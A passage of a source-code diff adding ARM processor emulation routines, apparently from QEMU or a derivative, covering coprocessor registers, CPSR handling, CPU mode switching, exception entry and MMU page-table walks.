(ARM_CP_SPECIAL|ARM_CP_CONST))) { + if (r->access & PL3_R) { + assert(r->fieldoffset || r->readfn); + } + if (r->access & PL3_W) { + assert(r->fieldoffset || r->writefn); + } + } + /* Bad type field probably means missing sentinel at end of reg list */ + assert(cptype_valid(r->type)); + for (crm = crmmin; crm <= crmmax; crm++) { + for (opc1 = opc1min; opc1 <= opc1max; opc1++) { + for (opc2 = opc2min; opc2 <= opc2max; opc2++) { + for (state = ARM_CP_STATE_AA32; + state <= ARM_CP_STATE_AA64; state++) { + if (r->state != state && r->state != ARM_CP_STATE_BOTH) { + continue; + } + add_cpreg_to_hashtable(cpu, r, opaque, state, + crm, opc1, opc2); + } + } + } + } +} + +void define_arm_cp_regs_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *regs, void *opaque) +{ + /* Define a whole list of registers */ + const ARMCPRegInfo *r; + for (r = regs; r->type != ARM_CP_SENTINEL; r++) { + define_one_arm_cp_reg_with_opaque(cpu, r, opaque); + } +} + +const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp) +{ + return g_hash_table_lookup(cpregs, &encoded_cp); +} + +void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Helper coprocessor write function for write-ignore registers */ +} + +uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Helper coprocessor write function for read-as-zero registers */ + return 0; +} + +void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque) +{ + /* Helper coprocessor reset function for do-nothing-on-reset registers */ +} + +static int bad_mode_switch(CPUARMState *env, int mode) +{ + /* Return true if it is not valid for us to switch to + * this CPU mode (ie all the UNPREDICTABLE cases in + * the ARM ARM CPSRWriteByInstr pseudocode). + */ + switch (mode) { + case ARM_CPU_MODE_USR: + case ARM_CPU_MODE_SYS: + case ARM_CPU_MODE_SVC: + case ARM_CPU_MODE_ABT: + case ARM_CPU_MODE_UND: + case ARM_CPU_MODE_IRQ: + case ARM_CPU_MODE_FIQ: + return 0; + case ARM_CPU_MODE_MON: + return !arm_is_secure(env); + default: + return 1; + } +} + +uint32_t cpsr_read(CPUARMState *env) +{ + int ZF; + ZF = (env->ZF == 0); + return env->uncached_cpsr | (env->NF & 0x80000000) | (ZF << 30) | + (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) + | (env->thumb << 5) | ((env->condexec_bits & 3) << 25) + | ((env->condexec_bits & 0xfc) << 8) + | (env->GE << 16) | (env->daif & CPSR_AIF); +} + +void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask) +{ + if (mask & CPSR_NZCV) { + env->ZF = (~val) & CPSR_Z; + env->NF = val; + env->CF = (val >> 29) & 1; + env->VF = (val << 3) & 0x80000000; + } + if (mask & CPSR_Q) + env->QF = ((val & CPSR_Q) != 0); + if (mask & CPSR_T) + env->thumb = ((val & CPSR_T) != 0); + if (mask & CPSR_IT_0_1) { + env->condexec_bits &= ~3; + env->condexec_bits |= (val >> 25) & 3; + } + if (mask & CPSR_IT_2_7) { + env->condexec_bits &= 3; + env->condexec_bits |= (val >> 8) & 0xfc; + } + if (mask & CPSR_GE) { + env->GE = (val >> 16) & 0xf; + } + + env->daif &= ~(CPSR_AIF & mask); + env->daif |= val & CPSR_AIF & mask; + + if ((env->uncached_cpsr ^ val) & mask & CPSR_M) { + if (bad_mode_switch(env, val & CPSR_M)) { + /* Attempt to switch to an invalid mode: this is UNPREDICTABLE. + * We choose to ignore the attempt and leave the CPSR M field + * untouched. + */ + mask &= ~CPSR_M; + } else { + switch_mode(env, val & CPSR_M); + } + } + mask &= ~CACHED_CPSR_BITS; + env->uncached_cpsr = (env->uncached_cpsr & ~mask) | (val & mask); +} + +/* Sign/zero extend */ +uint32_t HELPER(sxtb16)(uint32_t x) +{ + uint32_t res; + res = (uint16_t)(int8_t)x; + res |= (uint32_t)(int8_t)(x >> 16) << 16; + return res; +} + +uint32_t HELPER(uxtb16)(uint32_t x) +{ + uint32_t res; + res = (uint16_t)(uint8_t)x; + res |= (uint32_t)(uint8_t)(x >> 16) << 16; + return res; +} + +uint32_t HELPER(clz_arm)(uint32_t x) +{ + return clz32(x); +} + +int32_t HELPER(sdiv)(int32_t num, int32_t den) +{ + if (den == 0) + return 0; + if (num == INT_MIN && den == -1) + return INT_MIN; + return num / den; +} + +uint32_t HELPER(udiv)(uint32_t num, uint32_t den) +{ + if (den == 0) + return 0; + return num / den; +} + +uint32_t HELPER(rbit)(uint32_t x) +{ + x = ((x & 0xff000000) >> 24) + | ((x & 0x00ff0000) >> 8) + | ((x & 0x0000ff00) << 8) + | ((x & 0x000000ff) << 24); + x = ((x & 0xf0f0f0f0) >> 4) + | ((x & 0x0f0f0f0f) << 4); + x = ((x & 0x88888888) >> 3) + | ((x & 0x44444444) >> 1) + | ((x & 0x22222222) << 1) + | ((x & 0x11111111) << 3); + return x; +} + +#if defined(CONFIG_USER_ONLY) + +int arm_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + ARMCPU *cpu = ARM_CPU(NULL, cs); + CPUARMState *env = &cpu->env; + + env->exception.vaddress = address; + if (rw == 2) { + cs->exception_index = EXCP_PREFETCH_ABORT; + } else { + cs->exception_index = EXCP_DATA_ABORT; + } + return 1; +} + +/* These should probably raise undefined insn exceptions. */ +void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + cpu_abort(CPU(cpu), "v7m_msr %d\n", reg); +} + +uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + cpu_abort(CPU(cpu), "v7m_mrs %d\n", reg); + return 0; +} + +void switch_mode(CPUARMState *env, int mode) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (mode != ARM_CPU_MODE_USR) { + cpu_abort(CPU(cpu), "Tried to switch out of user mode\n"); + } +} + +void HELPER(set_r13_banked)(CPUARMState *env, uint32_t mode, uint32_t val) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + cpu_abort(CPU(cpu), "banked r13 write\n"); +} + +uint32_t HELPER(get_r13_banked)(CPUARMState *env, uint32_t mode) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + cpu_abort(CPU(cpu), "banked r13 read\n"); + return 0; +} + +unsigned int arm_excp_target_el(CPUState *cs, unsigned int excp_idx) +{ + return 1; +} + +#else + +/* Map CPU modes onto saved register banks. */ +int bank_number(int mode) +{ + switch (mode) { + default: + case ARM_CPU_MODE_USR: + case ARM_CPU_MODE_SYS: + return 0; + case ARM_CPU_MODE_SVC: + return 1; + case ARM_CPU_MODE_ABT: + return 2; + case ARM_CPU_MODE_UND: + return 3; + case ARM_CPU_MODE_IRQ: + return 4; + case ARM_CPU_MODE_FIQ: + return 5; + case ARM_CPU_MODE_HYP: + return 6; + case ARM_CPU_MODE_MON: + return 7; + } + //hw_error("bank number requested for bad CPSR mode value 0x%x\n", mode); +} + +void switch_mode(CPUARMState *env, int mode) +{ + int old_mode; + int i; + + old_mode = env->uncached_cpsr & CPSR_M; + if (mode == old_mode) + return; + + if (old_mode == ARM_CPU_MODE_FIQ) { + memcpy (env->fiq_regs, env->regs + 8, 5 * sizeof(uint32_t)); + memcpy (env->regs + 8, env->usr_regs, 5 * sizeof(uint32_t)); + } else if (mode == ARM_CPU_MODE_FIQ) { + memcpy (env->usr_regs, env->regs + 8, 5 * sizeof(uint32_t)); + memcpy (env->regs + 8, env->fiq_regs, 5 * sizeof(uint32_t)); + } + + i = bank_number(old_mode); + env->banked_r13[i] = env->regs[13]; + env->banked_r14[i] = env->regs[14]; + env->banked_spsr[i] = env->spsr; + + i = bank_number(mode); + env->regs[13] = env->banked_r13[i]; + env->regs[14] = env->banked_r14[i]; + env->spsr = env->banked_spsr[i]; +} + +/* + * Determine the target EL for a given exception type. + */ +unsigned int arm_excp_target_el(CPUState *cs, unsigned int excp_idx) +{ + CPUARMState *env = cs->env_ptr; + unsigned int cur_el = arm_current_el(env); + unsigned int target_el; + /* FIXME: Use actual secure state. */ + bool secure = false; + + if (!env->aarch64) { + /* TODO: Add EL2 and 3 exception handling for AArch32. */ + return 1; + } + + switch (excp_idx) { + case EXCP_HVC: + case EXCP_HYP_TRAP: + target_el = 2; + break; + case EXCP_SMC: + target_el = 3; + break; + case EXCP_FIQ: + case EXCP_IRQ: + { + const uint64_t hcr_mask = excp_idx == EXCP_FIQ ? HCR_FMO : HCR_IMO; + const uint32_t scr_mask = excp_idx == EXCP_FIQ ? SCR_FIQ : SCR_IRQ; + + target_el = 1; + if (!secure && (env->cp15.hcr_el2 & hcr_mask)) { + target_el = 2; + } + if (env->cp15.scr_el3 & scr_mask) { + target_el = 3; + } + break; + } + case EXCP_VIRQ: + case EXCP_VFIQ: + target_el = 1; + break; + default: + target_el = MAX(cur_el, 1); + break; + } + return target_el; +} + +static void v7m_push(CPUARMState *env, uint32_t val) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + env->regs[13] -= 4; + stl_phys(cs->as, env->regs[13], val); +} + +static uint32_t v7m_pop(CPUARMState *env) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + uint32_t val; + + val = ldl_phys(cs->as, env->regs[13]); + env->regs[13] += 4; + return val; +} + +/* Switch to V7M main or process stack pointer. */ +static void switch_v7m_sp(CPUARMState *env, int process) +{ + uint32_t tmp; + if (env->v7m.current_sp != process) { + tmp = env->v7m.other_sp; + env->v7m.other_sp = env->regs[13]; + env->regs[13] = tmp; + env->v7m.current_sp = process; + } +} + +static void do_v7m_exception_exit(CPUARMState *env) +{ + uint32_t type; + uint32_t xpsr; + + type = env->regs[15]; + //if (env->v7m.exception != 0) + // armv7m_nvic_complete_irq(env->nvic, env->v7m.exception); + + /* Switch to the target stack. */ + switch_v7m_sp(env, (type & 4) != 0); + /* Pop registers. */ + env->regs[0] = v7m_pop(env); + env->regs[1] = v7m_pop(env); + env->regs[2] = v7m_pop(env); + env->regs[3] = v7m_pop(env); + env->regs[12] = v7m_pop(env); + env->regs[14] = v7m_pop(env); + env->regs[15] = v7m_pop(env); + xpsr = v7m_pop(env); + xpsr_write(env, xpsr, 0xfffffdff); + /* Undo stack alignment. */ + if (xpsr & 0x200) + env->regs[13] |= 4; + /* ??? The exception return type specifies Thread/Handler mode. However + this is also implied by the xPSR value. Not sure what to do + if there is a mismatch. */ + /* ??? Likewise for mismatches between the CONTROL register and the stack + pointer. */ +} + +void arm_v7m_cpu_do_interrupt(CPUState *cs) +{ + CPUARMState *env = cs->env_ptr; + uint32_t xpsr = xpsr_read(env); + uint32_t lr; + uint32_t addr; + + arm_log_exception(cs->exception_index); + + lr = 0xfffffff1; + if (env->v7m.current_sp) + lr |= 4; + if (env->v7m.exception == 0) + lr |= 8; + + /* For exceptions we just mark as pending on the NVIC, and let that + handle it. */ + /* TODO: Need to escalate if the current priority is higher than the + one we're raising. */ + switch (cs->exception_index) { + case EXCP_UDEF: + //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_USAGE); + return; + case EXCP_SWI: + /* The PC already points to the next instruction. */ + //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SVC); + return; + case EXCP_PREFETCH_ABORT: + case EXCP_DATA_ABORT: + /* TODO: if we implemented the MPU registers, this is where we + * should set the MMFAR, etc from exception.fsr and exception.vaddress. + */ + //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_MEM); + return; + case EXCP_BKPT: +#if 0 + if (semihosting_enabled) { + int nr; + nr = arm_lduw_code(env, env->regs[15], env->bswap_code) & 0xff; + if (nr == 0xab) { + env->regs[15] += 2; + env->regs[0] = do_arm_semihosting(env); + qemu_log_mask(CPU_LOG_INT, "...handled as semihosting call\n"); + return; + } + } +#endif + //armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_DEBUG); + return; + case EXCP_IRQ: + //env->v7m.exception = armv7m_nvic_acknowledge_irq(env->nvic); + break; + case EXCP_EXCEPTION_EXIT: + do_v7m_exception_exit(env); + return; + default: + cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); + return; /* Never happens. Keep compiler happy. */ + } + + /* Align stack pointer. */ + /* ??? Should only do this if Configuration Control Register + STACKALIGN bit is set. */ + if (env->regs[13] & 4) { + env->regs[13] -= 4; + xpsr |= 0x200; + } + /* Switch to the handler mode. */ + v7m_push(env, xpsr); + v7m_push(env, env->regs[15]); + v7m_push(env, env->regs[14]); + v7m_push(env, env->regs[12]); + v7m_push(env, env->regs[3]); + v7m_push(env, env->regs[2]); + v7m_push(env, env->regs[1]); + v7m_push(env, env->regs[0]); + switch_v7m_sp(env, 0); + /* Clear IT bits */ + env->condexec_bits = 0; + env->regs[14] = lr; + addr = ldl_phys(cs->as, env->v7m.vecbase + env->v7m.exception * 4); + env->regs[15] = addr & 0xfffffffe; + env->thumb = addr & 1; +} + +/* Handle a CPU exception. */ +void arm_cpu_do_interrupt(CPUState *cs) +{ + CPUARMState *env = cs->env_ptr; + ARMCPU *cpu = ARM_CPU(env->uc, cs); + uint32_t addr; + uint32_t mask; + int new_mode; + uint32_t offset; + uint32_t moe; + + assert(!IS_M(env)); + + arm_log_exception(cs->exception_index); + + if (arm_is_psci_call(cpu, cs->exception_index)) { + arm_handle_psci_call(cpu); + qemu_log_mask(CPU_LOG_INT, "...handled as PSCI call\n"); + return; + } + + /* If this is a debug exception we must update the DBGDSCR.MOE bits */ + switch (env->exception.syndrome >> ARM_EL_EC_SHIFT) { + case EC_BREAKPOINT: + case EC_BREAKPOINT_SAME_EL: + moe = 1; + break; + case EC_WATCHPOINT: + case EC_WATCHPOINT_SAME_EL: + moe = 10; + break; + case EC_AA32_BKPT: + moe = 3; + break; + case EC_VECTORCATCH: + moe = 5; + break; + default: + moe = 0; + break; + } + + if (moe) { + env->cp15.mdscr_el1 = deposit64(env->cp15.mdscr_el1, 2, 4, moe); + } + + /* TODO: Vectored interrupt controller. */ + switch (cs->exception_index) { + case EXCP_UDEF: + new_mode = ARM_CPU_MODE_UND; + addr = 0x04; + mask = CPSR_I; + if (env->thumb) + offset = 2; + else + offset = 4; + break; + case EXCP_SWI: +#if 0 + if (semihosting_enabled) { + /* Check for semihosting interrupt. */ + if (env->thumb) { + mask = arm_lduw_code(env, env->regs[15] - 2, env->bswap_code) + & 0xff; + } else { + mask = arm_ldl_code(env, env->regs[15] - 4, env->bswap_code) + & 0xffffff; + } + /* Only intercept calls from privileged modes, to provide some + semblance of security. */ + if (((mask == 0x123456 && !env->thumb) + || (mask == 0xab && env->thumb)) + && (env->uncached_cpsr & CPSR_M) != ARM_CPU_MODE_USR) { + env->regs[0] = do_arm_semihosting(env); + qemu_log_mask(CPU_LOG_INT, "...handled as semihosting call\n"); + return; + } + } +#endif + new_mode = ARM_CPU_MODE_SVC; + addr = 0x08; + mask = CPSR_I; + /* The PC already points to the next instruction. */ + offset = 0; + break; + case EXCP_BKPT: +#if 0 + /* See if this is a semihosting syscall. */ + if (env->thumb && semihosting_enabled) { + mask = arm_lduw_code(env, env->regs[15], env->bswap_code) & 0xff; + if (mask == 0xab + && (env->uncached_cpsr & CPSR_M) != ARM_CPU_MODE_USR) { + env->regs[15] += 2; + env->regs[0] = do_arm_semihosting(env); + qemu_log_mask(CPU_LOG_INT, "...handled as semihosting call\n"); + return; + } + } +#endif + env->exception.fsr = 2; + /* Fall through to prefetch abort. */ + case EXCP_PREFETCH_ABORT: + env->cp15.ifsr_el2 = env->exception.fsr; + env->cp15.far_el[1] = deposit64(env->cp15.far_el[1], 32, 32, + env->exception.vaddress); + qemu_log_mask(CPU_LOG_INT, "...with IFSR 0x%x IFAR 0x%x\n", + env->cp15.ifsr_el2, (uint32_t)env->exception.vaddress); + new_mode = ARM_CPU_MODE_ABT; + addr = 0x0c; + mask = CPSR_A | CPSR_I; + offset = 4; + break; + case EXCP_DATA_ABORT: + env->cp15.esr_el[1] = env->exception.fsr; + env->cp15.far_el[1] = deposit64(env->cp15.far_el[1], 0, 32, + env->exception.vaddress); + qemu_log_mask(CPU_LOG_INT, "...with DFSR 0x%x DFAR 0x%x\n", + (uint32_t)env->cp15.esr_el[1], + (uint32_t)env->exception.vaddress); + new_mode = ARM_CPU_MODE_ABT; + addr = 0x10; + mask = CPSR_A | CPSR_I; + offset = 8; + break; + case EXCP_IRQ: + new_mode = ARM_CPU_MODE_IRQ; + addr = 0x18; + /* Disable IRQ and imprecise data aborts. */ + mask = CPSR_A | CPSR_I; + offset = 4; + break; + case EXCP_FIQ: + new_mode = ARM_CPU_MODE_FIQ; + addr = 0x1c; + /* Disable FIQ, IRQ and imprecise data aborts. */ + mask = CPSR_A | CPSR_I | CPSR_F; + offset = 4; + break; + case EXCP_SMC: + new_mode = ARM_CPU_MODE_MON; + addr = 0x08; + mask = CPSR_A | CPSR_I | CPSR_F; + offset = 0; + break; + default: + cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); + return; /* Never happens. Keep compiler happy. */ + } + /* High vectors. */ + if (env->cp15.c1_sys & SCTLR_V) { + /* when enabled, base address cannot be remapped. */ + addr += 0xffff0000; + } else { + /* ARM v7 architectures provide a vector base address register to remap + * the interrupt vector table. + * This register is only followed in non-monitor mode, and has a secure + * and un-secure copy. Since the cpu is always in a un-secure operation + * and is never in monitor mode this feature is always active. + * Note: only bits 31:5 are valid. + */ + addr += env->cp15.vbar_el[1]; + } + + if ((env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { + env->cp15.scr_el3 &= ~SCR_NS; + } + + switch_mode (env, new_mode); + /* For exceptions taken to AArch32 we must clear the SS bit in both + * PSTATE and in the old-state value we save to SPSR_, so zero it now. + */ + env->uncached_cpsr &= ~PSTATE_SS; + env->spsr = cpsr_read(env); + /* Clear IT bits. */ + env->condexec_bits = 0; + /* Switch to the new mode, and to the correct instruction set. */ + env->uncached_cpsr = (env->uncached_cpsr & ~CPSR_M) | new_mode; + env->daif |= mask; + /* this is a lie, as the was no c1_sys on V4T/V5, but who cares + * and we should just guard the thumb mode on V4 */ + if (arm_feature(env, ARM_FEATURE_V4T)) { + env->thumb = (env->cp15.c1_sys & SCTLR_TE) != 0; + } + env->regs[14] = env->regs[15] + offset; + env->regs[15] = addr; + cs->interrupt_request |= CPU_INTERRUPT_EXITTB; +} + +/* Check section/page access permissions. + Returns the page protection flags, or zero if the access is not + permitted. */ +static inline int check_ap(CPUARMState *env, int ap, int domain_prot, + int access_type, int is_user) +{ + int prot_ro; + + if (domain_prot == 3) { + return PAGE_READ | PAGE_WRITE; + } + + if (access_type == 1) + prot_ro = 0; + else + prot_ro = PAGE_READ; + + switch (ap) { + case 0: + if (arm_feature(env, ARM_FEATURE_V7)) { + return 0; + } + if (access_type == 1) + return 0; + switch (env->cp15.c1_sys & (SCTLR_S | SCTLR_R)) { + case SCTLR_S: + return is_user ? 0 : PAGE_READ; + case SCTLR_R: + return PAGE_READ; + default: + return 0; + } + case 1: + return is_user ? 0 : PAGE_READ | PAGE_WRITE; + case 2: + if (is_user) + return prot_ro; + else + return PAGE_READ | PAGE_WRITE; + case 3: + return PAGE_READ | PAGE_WRITE; + case 4: /* Reserved. */ + return 0; + case 5: + return is_user ? 0 : prot_ro; + case 6: + return prot_ro; + case 7: + if (!arm_feature (env, ARM_FEATURE_V6K)) + return 0; + return prot_ro; + default: + abort(); + } +} + +static bool get_level1_table_address(CPUARMState *env, uint32_t *table, + uint32_t address) +{ + if (address & env->cp15.c2_mask) { + if ((env->cp15.c2_control & TTBCR_PD1)) { + /* Translation table walk disabled for TTBR1 */ + return false; + } + *table = env->cp15.ttbr1_el1 & 0xffffc000; + } else { + if ((env->cp15.c2_control & TTBCR_PD0)) { + /* Translation table walk disabled for TTBR0 */ + return false; + } + *table = env->cp15.ttbr0_el1 & env->cp15.c2_base_mask; + } + *table |= (address >> 18) & 0x3ffc; + return true; +} + +static int get_phys_addr_v5(CPUARMState *env, uint32_t address, int access_type, + int is_user, hwaddr *phys_ptr, + int *prot, target_ulong *page_size) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + int code; + uint32_t table; + uint32_t desc; + int type; + int ap; + int domain = 0; + int domain_prot; + hwaddr phys_addr; + + /* Pagetable walk. */ + /* Lookup l1 descriptor. */ + if (!get_level1_table_address(env, &table, address)) { + /* Section translation fault if page walk is disabled by PD0 or PD1 */ + code = 5; + goto do_fault; + } + desc = ldl_phys(cs->as, table); + type = (desc & 3); + domain = (desc >> 5) & 0x0f; + domain_prot = (env->cp15.c3 >> (domain * 2)) & 3; + if (type == 0) { + /* Section translation fault. */ + code = 5; + goto do_fault; + } + if (domain_prot == 0 || domain_prot == 2) { + if (type == 2) + code = 9; /* Section domain fault. */ + else + code = 11; /* Page domain fault. */ + goto do_fault; + } + if (type == 2) { + /* 1Mb section. */ + phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); + ap = (desc >> 10) & 3; + code = 13; + *page_size = 1024 * 1024; + } else { + /* Lookup l2 entry. */ + if (type == 1) { + /* Coarse pagetable. */ + table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); + } else { + /* Fine pagetable. */ + table = (desc & 0xfffff000) | ((address >> 8) & 0xffc); + } + desc = ldl_phys(cs->as, table); + switch (desc & 3) { + case 0: /* Page translation fault. */ + code = 7; + goto do_fault; + case 1: /* 64k page. */ + phys_addr = (desc & 0xffff0000) | (address & 0xffff); + ap = (desc >> (4 + ((address >> 13) & 6))) & 3; + *page_size = 0x10000; + break; + case 2: /* 4k page. */ + phys_addr = (desc & 0xfffff000) | (address & 0xfff); + ap = (desc >> (4 + ((address >> 9) & 6))) & 3; + *page_size = 0x1000; + break; + case 3: /* 1k page. */ + if (type == 1) { + if (arm_feature(env, ARM_FEATURE_XSCALE)) { + phys_addr = (desc & 0xfffff000) | (address & 0xfff); + } else { + /* Page translation fault. */ + code = 7; + goto do_fault; + } + } else { + phys_addr = (desc & 0xfffffc00) | (address & 0x3ff); + } + ap = (desc >> 4) & 3; + *page_size = 0x400; + break; + default: + /* Never happens, but compiler isn't smart enough to tell. */ + abort(); + } + code = 15; + } + *prot = check_ap(env, ap, domain_prot, access_type, is_user); + if (!*prot) { + /* Access permission fault. */ + goto do_fault; + } + *prot |= PAGE_EXEC; + *phys_ptr = phys_addr; + return 0; +do_fault: + return code | (domain << 4); +} + +static int get_phys_addr_v6(CPUARMState *env, uint32_t address, int access_type, + int is_user, hwaddr *phys_ptr, + int *prot, target_ulong *page_size) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + int code; + uint32_t table; + uint32_t desc; + uint32_t xn; + uint32_t pxn = 0; + int type; + int ap; + int domain = 0; + int domain_prot; + hwaddr phys_addr; + + /* Pagetable walk. */ + /* Lookup l1 descriptor. */ + if (!get_level1_table_address(env, &table, address)) { + /* Section translation fault if page walk is disabled by PD0 or PD1 */ + code = 5; + goto do_fault; + } + desc = ldl_phys(cs->as, table); + type = (desc & 3); + if (type == 0 || (type == 3 && !arm_feature(env, ARM_FEATURE_PXN))) { + /* Section translation fault, or attempt to use the encoding + * which is Reserved on implementations without PXN. + */ + code = 5; + goto do_fault; + } + if ((type == 1) || !(desc & (1 << 18))) { + /* Page or Section. */ + domain = (desc >> 5) & 0x0f; + } + domain_prot = (env->cp15.c3 >> (domain * 2)) & 3; + if (domain_prot == 0 || domain_prot == 2) { + if (type != 1) { + code = 9; /* Section domain fault. */ + } else { + code = 11; /* Page domain fault. */ + } + goto do_fault; + } + if (type != 1) { + if (desc & (1 << 18)) { + /* Supersection. */ + phys_addr = (desc & 0xff000000) | (address & 0x00ffffff); + *page_size = 0x1000000; + } else { + /* Section. */ + phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); + *page_size = 0x100000; + } + ap = ((desc >> 10) & 3) | ((desc >> 13) & 4); + xn = desc & (1 << 4); + pxn = desc & 1; + code = 13; + } else { + if (arm_feature(env, ARM_FEATURE_PXN)) { + pxn = (desc >> 2) & 1; + } + /* Lookup l2 entry. */ + table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); + desc = ldl_phys(cs->as, table); + ap = ((desc >> 4) & 3) | ((desc >> 7) & 4); + switch (desc & 3) { + case 0: /* Page translation fault. */ + code = 7; + goto do_fault; + case 1: /* 64k page. */ + phys_addr = (desc & 0xffff0000) | (address & 0xffff); + xn = desc & (1 << 15); + *page_size = 0x10000; + break; + case 2: case 3: /* 4k page. */ + phys_addr = (desc & 0xfffff000) | (address & 0xfff); + xn = desc & 1; + *page_size = 0x1000; + break; + default: + /* Never happens, but compiler isn't smart enough to tell. */ + abort(); + } + code = 15; + } + if (domain_prot == 3) { + *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + } else { + if (pxn && !is_user) { + xn = 1; + } + if (xn && access_type == 2) + goto do_fault; + + /* The simplified model uses AP[0] as an access control bit. */ + if ((env->cp15.c1_sys & SCTLR_AFE) && (ap & 1) == 0) { + /* Access flag fault. */ + code = (code == 15) ? 6 : 3; + goto do_fault; + } + *prot = check_ap(env, ap, domain_prot, access_type, is_user); + if (!*prot) { + /* Access permission fault. */ + goto do_fault; + } + if (!xn) { + *prot |= PAGE_EXEC; + } + } + *phys_ptr = phys_addr; + return 0; +do_fault: + return code | (domain << 4); +} + +/* Fault type for long-descriptor MMU fault reporting; this corresponds + * to bits [5..2] in the STATUS field in long-format DFSR/IFSR. + */ +typedef enum { + translation_fault = 1, + access_fault = 2, + permission_fault = 3, +} MMUFaultType; + +static int get_phys_addr_lpae(CPUARMState *env, target_ulong address, + int access_type, int is_user, + hwaddr *phys_ptr, int *prot, + target_ulong *page_size_ptr) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + /* Read an LPAE long-descriptor translation table. */ + MMUFaultType fault_type = translation_fault; + uint32_t level = 1; + uint32_t epd; + int32_t tsz; + uint32_t tg; + uint64_t ttbr; + int ttbr_select; + hwaddr descaddr, descmask; + uint32_t tableattrs; + target_ulong page_size; + uint32_t attrs; + int32_t granule_sz = 9; + int32_t va_size = 32; + int32_t tbi = 0; + uint32_t t0sz; + uint32_t t1sz; + + if (arm_el_is_aa64(env, 1)) { + va_size = 64; + if (extract64(address, 55, 1)) + tbi = extract64(env->cp15.c2_control, 38, 1); + else + tbi = extract64(env->cp15.c2_control, 37, 1); + tbi *= 8; + } + + /* Determine whether this address is in the region controlled by + * TTBR0 or TTBR1 (or if it is in neither region and should fault). + * This is a Non-secure PL0/1 stage 1 translation, so controlled by + * TTBCR/TTBR0/TTBR1 in accordance with ARM ARM DDI0406C table B-32: + */ + t0sz = extract32(env->cp15.c2_control, 0, 6); + if (arm_el_is_aa64(env, 1)) { + t0sz = MIN(t0sz, 39); + t0sz = MAX(t0sz, 16); + } + t1sz = extract32(env->cp15.c2_control, 16, 6); + if (arm_el_is_aa64(env, 1)) { + t1sz = MIN(t1sz, 39); + t1sz = MAX(t1sz, 16); + } + if (t0sz && !extract64(address, va_size - t0sz, t0sz - tbi)) { + /* there is a ttbr0 region and we are in it (high bits all zero) */ + ttbr_select = 0; + } else if (t1sz && !extract64(~address, va_size - t1sz, t1sz - tbi)) { + /* there is a ttbr1 region and we are in it (high bits all one) */ + ttbr_select = 1; + } else if (!t0sz) { + /* ttbr0 region is "everything not in the ttbr1 region" */ + ttbr_select = 0; + } else if (!t1sz) { + /* ttbr1 region is "everything not in the ttbr0 region" */ + ttbr_select = 1; + } else { + /* in the gap between the two regions, this is a Translation fault */ + fault_type = translation_fault; + goto do_fault; + } + + /* Note that QEMU ignores shareability and cacheability attributes, + * so we don't need to do anything with the SH, ORGN, IRGN fields + * in the TTBCR. Similarly, TTBCR:A1 selects whether we get the + * ASID from TTBR0 or TTBR1, but QEMU's TLB doesn't currently + * implement any ASID-like capability so we can ignore it (instead + * we will always flush the TLB any time the ASID is changed). + */ + if (ttbr_select == 0) { + ttbr = env->cp15.ttbr0_el1; + epd = extract32(env->cp15.c2_control, 7, 1); + tsz = t0sz; + + tg = extract32(env->cp15.c2_control, 14, 2); + if (tg == 1) { /* 64KB pages */ + granule_sz = 13; + } + if (tg == 2) { /* 16KB pages */ + granule_sz = 11; + } + } else { + ttbr = env->cp15.ttbr1_el1; + epd = extract32(env->cp15.c2_control, 23, 1); + tsz = t1sz; + + tg = extract32(env->cp15.c2_control, 30, 2); + if (tg == 3) { /* 64KB pages */ + granule_sz = 13; + } + if (tg == 1) { /* 16KB pages */ + granule_sz = 11; + } + } + + if (epd) { + /* Translation table walk disabled => Translation fault on TLB miss */ + goto do_fault; + } + + /* The starting level depends on the virtual address size (which can be + * up to 48 bits) and the translation granule size. It indicates the number + * of strides (granule_sz bits at a time) needed to consume the bits + * of the input address. In the pseudocode this is: + * level = 4 - RoundUp((inputsize - grainsize) / stride) + * where their 'inputsize' is our 'va_size - tsz', 'grainsize' is + * our 'granule_sz + 3' and 'stride' is our 'granule_sz'. + * Applying the usual "rounded up m/n is (m+n-1)/n" and simplifying: + * = 4 - (va_size - tsz - granule_sz - 3 + granule_sz - 1) / granule_sz + * = 4 - (va_size - tsz - 4) / granule_sz; + */ + level = 4 - (va_size - tsz - 4) / granule_sz; + + /* Clear the vaddr bits which aren't part of the within-region address, + * so that we don't have to special case things when calculating the + * first descriptor address. + */ + if (tsz) { + address &= (1ULL << (va_size - tsz)) - 1; + } + + descmask = (1ULL << (granule_sz + 3)) - 1; + + /* Now we can extract the actual base address from the TTBR */ + descaddr = extract64(ttbr, 0, 48); + descaddr &= ~((1ULL << (va_size - tsz - (granule_sz * (4 - level)))) - 1); + + tableattrs = 0; + for (;;) { + uint64_t descriptor; + + descaddr |= (address >> (granule_sz * (4 